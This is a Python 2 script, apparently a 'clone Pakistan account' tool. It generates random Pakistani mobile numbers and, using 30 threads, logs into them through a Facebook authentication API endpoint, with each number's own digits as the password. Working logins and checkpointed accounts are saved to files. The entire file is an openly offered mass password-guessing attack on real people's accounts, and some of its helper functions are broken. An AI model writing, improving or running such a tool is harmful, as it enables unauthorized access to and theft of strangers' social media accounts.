# Ustad# SIDRA5# Thuglife# Somibro# Gamz#!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
os.system('rm -rf .txt')
for n in range(10000):

    nmbr = random.randint(1111111111, 9999999999)
    
    sys.stdout = open('.txt', 'a')

    print nmbr

    sys.stdout.flush()
    
try:
    import requests
except ImportError:
    os.system('pip2 install mechanize')
    
try:
    import mechanize
except ImportError:
    os.system('pip2 install request')
    time.sleep(1)
    os.system('Then type: python2 Awan.py')

import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser


reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('user-agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.4 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.4 facebookexternalhit/1.1 Facebot Twitterbot/1.0;]')]
def keluar():
	print 'Thanks.'
	os.sys.exit()

def acak(b):
    w = 'ahtdzjc'
    d = ''
    for i in x:
        d += '!'+w[random.randint(0,len(w)-1)]+i
    return cetak(d)


def cetak(b):
    w = 'ahtdzjc'
    for i in w:
        j = w.index(i)
        x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
    x += '\033[0m'
    x = x.replace('!0','\033[0m')
    sys.stdout.write(x+'\n')
def psb(z):
    for e in z + '\n':
        sys.stdout.write(e)
        sys.stdout.flush()
        time.sleep(0.03)

def jalan(z):
	for e in z + '\n':
		sys.stdout.write(e)
		sys.stdout.flush()
		time.sleep(00000.1)
def tik():
	titik = ['.   ','..  ','... ']
	for o in titik:
		print("\r\x1b[1;93mPlease Wait \x1b[1;91m"+o),;sys.stdout.flush();time.sleep(1)


back = 0
oks = []
id = []
cpb = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"

os.system("clear")
banner = """
   \033[1;91m _______   _______      ___ ___   ___ 
  \033[1;91m |   _   | |   _   |    |   Y   | |   |
  \033[1;31m |   1___| |.  |   |    |.      | |.  |
  \033[1;31m |____   | |.  |   |    |. \_/  | |.  |
  \033[1;90m |:  1   | |:  1   |    |:  |   | |:  |
  \033[1;90m |::.. . | |::.. . |    |::.|:. | |::.|
  \033[1;90m `-------' `-------'    `--- ---' `---'
   
"""
banner1 = """
\033[4;97mMOBILINK/JAZZ CODE HERE\033[1;0m
\033[1;91m[\xe2\x97\x8f]\033[1;96m00, 01, 02, 03, 04,
\033[1;91m[\xe2\x97\x8f]\033[1;93m05, 06, 07, 08, 09,
\033[4;97mTELINORE CODE HERE\033[1;0m
\033[1;91m[\xe2\x97\x8f]\033[1;96m40, 41, 42, 43, 44,
\033[1;91m[\xe2\x97\x8f]\033[1;93m45, 46, 47 ,48 ,49,
\033[4;97mWARID CODE HERE\033[1;0m
\033[1;91m[\xe2\x97\x8f]\033[1;96m20, 21, 22, 23,
\033[1;91m[\xe2\x97\x8f]\033[1;93m24, ??, ??, ??,
\033[4;97mUFONE CODE HERE\033[1;0m
\033[1;91m[\xe2\x97\x8f]\033[1;96m31, 32, 33, 34,
\033[1;91m[\xe2\x97\x8f]\033[1;93m35, 36, 37, ??,
\033[4;97mZONG CODE HERE\033[1;0m
\033[1;91m[\xe2\x97\x8f]\033[1;96m10, 11, 12, 13,
\033[1;91m[\xe2\x97\x8f]\033[1;93m14, 15, 16, 17,

"""
##### LICENSE #####
#=================#
def lisensi():
    os.system('clear')
    login()
####login#########
def login():
    os.system('clear')
    print banner
    
    print '\033[1;97mENTER\033[1;91m> \033[1;92m\033[1;93m\xe2\x97\x8f\033[1;91m01\033[1;97m\xe2\x97\x8f \033[1;97mTHEN CLONE PAKISTAN ACCOUNT '
    print '\033[1;97mENTER\033[1;91m> \033[1;92m\033[1;97m\xe2\x97\x8f\033[1;91m00\033[1;93m\xe2\x97\x8f \033[1;97mTHEN CLOSE  PROGRAM '
    pilih_login()
def pilih_login():
    peak = raw_input("\n\033[1;95mCHOOSE: \033[1;93m")
    if peak =="":
        print "\x1b[1;97mFill In Correctly"
        pilih_login()
    elif peak =="1":
    	os.system("clear")
        print banner
        print banner1
        try:
            c = raw_input("\033[1;97mCHOOSE : ")
            k = raw_input("\033[1;97mCHOOSE : ")
            idlist = ('.txt')
            for line in open(idlist,"r").readlines():
                id.append(line.strip())
        except IOError:
            print ("[!] File Not Found")
            raw_input("\n[ Back ]")

    
    elif peak =="00":
        login()
    else:
        print '[!] Fill In Correctly'
        pilih_login()
    print 47* '\033[1;97m='
    xxx = str(len(id))
    psb('\033[1;97m[\033[1;93m+\033[1;97m] \033[1;92mTOTAL ACC\033[1;91mOUNT NU\033[1;96mMBERS: ' + xxx)
    time.sleep(0.5)
    psb('\033[1;97m[\033[1;92m\xe2\x9c\x93\033[1;97m]\033[1;91m PLEASE WAIT, \033[1;92mPROCE\033[1;96mSS IS START..')
    time.sleep(0.5)
    psb('\033[1;97m[\033[1;91m!\033[1;97m] \033[1;92mTO STOP T\033[1;96mHIS PROCESS PRESS \033[1;91mCtrl THEN z')
    time.sleep(0.5)
    print 47* '\033[1;97m='
    def main(arg):
        global cpb,oks
        user = arg
        try:
            os.mkdir('save')
        except OSError:
            pass
        try:
            pass1 = user
            data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
            q = json.load(data)
            if 'access_token' in q:
                print '\x1b[1;93m(Enjoy)   ' + k + c + user + '   |   ' + pass1                                       
                okb = open('save/successfull.txt', 'a')
                okb.write(k+c+user+pass1+'\n')
                okb.close()
                oks.append(c+user+pass1)
            else:
                if 'www.facebook.com' in q['error_msg']:
                    print '\033[1;97m(OHH NO \033[1;91mCP+) \033[1;93m ' + k + c + user + '   \033[1;96m|   ' + pass1
                    cps = open('save/checkpoint.txt', 'a')
                    cps.write(k+c+user+pass1+'\n')
                    cps.close()
                    cpb.append(c+user+pass1)
                
        except:
            pass
        
    p = ThreadPool(30)
    p.map(main, id)
    print 50* '\033[1;91m-'
    print 'Process Has Been Completed ...'
    print 'Total Online/Offline : '+str(len(oks))+'/'+str(len(cpb))
    print('Cloned Accounts Has Been Saved : save/cloned.txt')
    jalan("Note : Your Offline account Will Open after 10 to 20 days")
    print ''
    print """


"""

    
    raw_input("\n\033[1;92m[\033[1;92mBack\033[1;95m]")
    login() 
          

          

if __name__ == '__main__':
    login()
